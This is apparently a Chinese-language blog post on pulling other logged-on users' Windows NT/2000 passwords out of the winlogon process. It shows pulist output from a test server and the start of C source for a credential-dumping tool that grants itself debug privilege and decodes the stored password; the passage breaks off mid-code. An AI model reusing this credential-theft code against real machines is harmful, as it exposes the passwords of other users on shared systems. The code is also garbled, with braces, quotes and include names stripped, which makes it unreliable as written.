获取windows登陆账户密码-

Windows Logon Process，Windows NT 用户登陆程序，管理用户登录和退出。因为登陆的域名和用户名是明文存储在 winlogon 进程里的，而 Password 是限定了查找本进程用户的密码，然后到 winlogon 进程的空间中查找 UserDomain 和 UserName ，找到后就查后边的加密口令。其实只要你自己指定用户名和 winlogon 进程去查找就行了，只要你是管理员，任何本机用msgina.dll 图形登陆的用户口令都可以找到。1. pulist，找到系统里登陆的域名和用户名，及 winlogon 进程 id 2. 然后给每个 winlogon 进程 id 查找指定的用户就行了。example:C:Documents and Settingsbinglepulist Process PID User Idle 0 System 8 smss.exe 164 NT AUTHORITYSYSTEM csrss.exe 192 NT AUTHORITYSYSTEM winlogon.exe 188 NT AUTHORITYSYSTEM wins.exe 1212 NT AUTHORITYSYSTEM Explorer.exe 388 TEST-2KSERVERAdministrator internat.exe 1828 TEST-2KSERVERAdministrator conime.exe 1868 TEST-2KSERVERAdministrator msiexec.exe 1904 NT AUTHORITYSYSTEM tlntsvr.exe 1048 NT AUTHORITYSYSTEM taskmgr.exe 1752 TEST-2KSERVERAdministrator csrss.exe 2056 NT AUTHORITYSYSTEM winlogon.exe 2416 NT AUTHORITYSYSTEM rdpclip.exe 2448 TEST-2KSERVERclovea Explorer.exe 2408 TEST-2KSERVERclovea internat.exe 1480 TEST-2KSERVERclovea cmd.exe 2508 TEST-2KSERVERAdministrator ntshell.exe 368 TEST-2KSERVERAdministrator ntshell.exe 1548 TEST-2KSERVERAdministrator ntshell.exe 1504 TEST-2KSERVERAdministrator csrss.exe 1088 NT AUTHORITYSYSTEM winlogon.exe 1876 NT AUTHORITYSYSTEM rdpclip.exe 1680 TEST-2KSERVERbingle Explorer.exe 2244 TEST-2KSERVERbingle conime.exe 2288 TEST-2KSERVERbingle internat.exe 1592 TEST-2KSERVERbingle cmd.exe 1692 TEST-2KSERVERbingle mdm.exe 2476 TEST-2KSERVERbingle taskmgr.exe 752 TEST-2KSERVERbingle pulist.exe 2532 TEST-2KSERVERbingle具体实现代码如下双击代码全选#include #include #include #include typedef struct _UNICODE_STRING USHORT Length; USHORT MaximumLength; PWSTR Buffer; UNICODE_STRING, *PUNICODE_STRING; / Undocumented typedefs typedef struct _QUERY_SYSTEM_INFORMATION DWORD GrantedAccess; DWORD PID; WORD HandleType; WORD HandleId; DWORD Handle; QUERY_SYSTEM_INFORMATION, *PQUERY_SYSTEM_INFORMATION; typedef struct _PROCESS_INFO_HEADER DWORD Count; DWORD Unk04; DWORD Unk08; PROCESS_INFO_HEADER, *PPROCESS_INFO_HEADER; typedef struct _PROCESS_INFO DWORD LoadAddress; DWORD Size; DWORD Unk08; DWORD Enumerator; DWORD Unk10; char Name 0x108; PROCESS_INFO, *PPROCESS_INFO; typedef struct _ENCODED_PASSWORD_INFO DWORD HashByte; DWORD Unk04; DWORD Unk08; DWORD Unk0C; FILETIME LoggedOn; DWORD Unk18; DWORD Unk1C; DWORD Unk20; DWORD Unk24; DWORD Unk28; UNICODE_STRING EncodedPassword; ENCODED_PASSWORD_INFO, *PENCODED_PASSWORD_INFO; typedef DWORD (_stdcall *PFNNTQUERYSYSTEMINFORMATION) (DWORD, PVOID, DWORD, PDWORD); typedef PVOID (_stdcall *PFNRTLCREATEQUERYDEBUGBUFFER) (DWORD, DWORD); typedef DWORD (_stdcall *PFNRTLQUERYPROCESSDEBUGINFORMATION) (DWORD, DWORD, PVOID); typedef void (_stdcall *PFNRTLDESTROYQUERYDEBUGBUFFER) (PVOID); typedef void (_stdcall *PFNTRTLRUNDECODEUNICODESTRING) (BYTE, PUNICODE_STRING); / Private Prototypes BOOL IsWinNT (void); BOOL IsWin2K (void); BOOL AddDebugPrivilege (void); DWORD FindWinLogon (void); BOOL LocatePasswordPageWinNT (DWORD, PDWORD); BOOL LocatePasswordPageWin2K (DWORD, PDWORD); void DisplayPasswordWinNT (void); void DisplayPasswordWin2K (void); / Global Variables PFNNTQUERYSYSTEMINFORMATION pfnNtQuerySystemInformation; PFNRTLCREATEQUERYDEBUGBUFFER pfnRtlCreateQueryDebugBuffer; PFNRTLQUERYPROCESSDEBUGINFORMATION pfnRtlQueryProcessDebugInformation; PFNRTLDESTROYQUERYDEBUGBUFFER pfnRtlDestroyQueryDebugBuffer; PFNTRTLRUNDECODEUNICODESTRING pfnRtlRunDecodeUnicodeString; DWORD PasswordLength = 0; PVOID RealPasswordP = NULL; PVOID PasswordP = NULL; DWORD HashByte = 0; wchar_t UserName 0x400; wchar_t UserDomain 0x400; int _cdecl main( int argc, char* argv ) printf( nt To Find Password in the Winlogon processn ); printf( Usage: %s DomainName UserName PID-of-WinLogonnn, argv0 ); if (!IsWinNT () & (!IsWin2K () printf (Windows NT or Windows 2000 are required.n); return (0); / Add debug privilege to PasswordReminder - / this is needed for the search for Winlogon. / 增加 PasswordReminder 的权限 / 使得 PasswordReminder 可以打开并调试 Winlogon 进程 if (!AddDebugPrivilege () printf (Unable to add debug privilege.n); return (0); printf (The debug privilege has been added to PasswordReminder.n); / 获得几个未公开 API 的入口地址 HINSTANCE hNtDll = LoadLibrary (NTDLL.DLL); pfnNtQuerySystemInformation =